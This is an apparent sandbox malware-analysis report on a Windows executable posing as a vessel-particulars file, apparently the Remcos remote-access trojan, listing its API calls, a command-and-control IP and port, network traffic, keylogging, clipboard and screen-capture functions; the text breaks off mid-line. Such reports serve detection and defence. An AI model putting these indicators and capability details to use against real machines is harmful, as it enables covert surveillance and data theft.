          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c17_2_0040A71E
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_004057B6 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,17_2_004057B6
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040BEA2 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?17_2_0040BEA2

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: 185.244.26.244
          Uses ping.exe to check the status of other devices and networksShow sources
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
          Source: global trafficTCP traffic: 192.168.2.3:49739 -> 185.244.26.244:5888
          Source: Joe Sandbox ViewIP Address: 185.244.26.244 185.244.26.244
          Source: Joe Sandbox ViewASN Name: VAMU-ASIP-TRANSITVAMURU VAMU-ASIP-TRANSITVAMURU
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: unknownTCP traffic detected without corresponding DNS query: 185.244.26.244
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040221C ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,17_2_0040221C
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Contains functionality to capture and log keystrokesShow sources
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: [Esc] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: [Enter] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: [Tab] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: [Down] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: [Right] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: [Up] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: [Left] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: [End] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: [F2] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: [F1] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: [Del] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: [Del] 17_2_004043BF
          Installs a global keyboard hookShow sources
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\remcos\svchosts.exeJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_004050FC OpenClipboard,GetClipboardData,CloseClipboard,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,17_2_004050FC
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_004050FC OpenClipboard,GetClipboardData,CloseClipboard,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,17_2_004050FC
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040D71E CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,StretchBlt,GetObjectA,LocalAlloc,GlobalAlloc,GetDIBits,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteD